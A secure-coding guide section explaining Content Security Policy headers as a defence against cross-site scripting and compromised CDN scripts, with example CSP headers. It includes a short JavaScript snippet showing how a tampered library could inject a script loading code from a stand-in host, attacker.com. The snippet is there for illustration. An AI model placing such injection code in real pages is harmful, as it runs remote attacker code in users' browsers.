Content Security Policy
Content Security Policy (CSP) is W3C Candidate Recommendation introduced to prevent Cross-Site Scripting attacks, click jacking and other code injection attacks.
If you already read Dependencies and Interpreted Code Integrity general coding practices, you will see that they share some security concerns.
Starting with Dependencies. As our applications have dependencies, dependencies also have their own dependencies. How do we know them all?
Our applications are build server-side and are then sent to the client where they run and live throughout most of the execution time. How do they know what is running there?
Let's assume that you do not have SRI in place (if so, please read the Interpreted Code Integrity section) and you're loading JavaScript resources from a CDN. How do you know that these JavaScript resources only download known dependencies and nothing else? What if the CDN gets compromised and one of the JavaScript resources that your application downloads includes a malicious payload? Think of something such as the example below in the middle of a huge library:
const s = document.createElement(s);
s.src='//attacker.com/malicious.js';
document.body.appendChild(s);
Content-Security-Policy
is an HTTP response header which allows the server to
tell the web browser what dynamic resources are allowed to load.
By "dynamic resources" you should consider JavaScript scripts, stylesheets,
images, XMLHttpRequests (AJAX), WebSockets or EventSource, fonts, objects
(<object>
, <embed>
or <applet>
), media (<audio>
and <video>
), frames
and forms.
You're recommended to read the official Content Security Policy Reference so that you can take full advantage of all its features.
For completeness, the following examples lock your application resources to the
same origin policy - resources are only allowed to load when they come from your
application domain (self
).
Content-Security-Policy: default-src 'none'; script-src 'self'; connect-src 'self'; img-src 'self'; style-src 'self';
As stated before, CSP also fits OWASP recommendations for Interpreted Code
Integrity overlapping SRI capabilities. For example, a hash can be provided
to script-src
allowing it to run if and only if it matches, give hash
Content-Security-Policy: script-src 'sha256-qznLcsROx4GACP2dm0UCKCzCG+HiZ1guq6ZZDob/Tng='
Although CSP is not bulletproof and it may look hard to manage, you should definitely apply it to your web applications.